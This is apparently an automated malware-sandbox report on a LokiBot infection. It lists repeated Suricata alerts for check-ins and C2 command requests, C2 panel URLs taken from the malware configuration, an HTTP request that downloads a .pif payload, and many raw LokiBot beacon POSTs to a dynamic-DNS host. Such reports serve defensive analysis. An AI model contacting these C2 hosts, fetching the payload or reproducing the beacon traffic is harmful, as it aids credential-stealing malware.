Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64438 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64397
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64355 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64355
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64411 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64440 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:49713
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64440
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64359 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64439 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64434
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64438
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64370 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64371 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64370
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64446 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64447 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64399 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64446
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64447
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64383 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64383
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64411
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64428
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64381 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64359
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64418 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64399
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64439
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64413 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64401 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64366 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64401
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64373
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64414 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64419 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64419
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64418
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64378 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64378
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64381
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64414
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64448 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64406 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64448
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64429 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64429 -> 45.149.241.169:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php

Uses dynamic DNS services

Source: unknown

DNS query: name: freighteighttwocam.ddns.net

Source: global traffic

HTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UUNETUS UUNETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
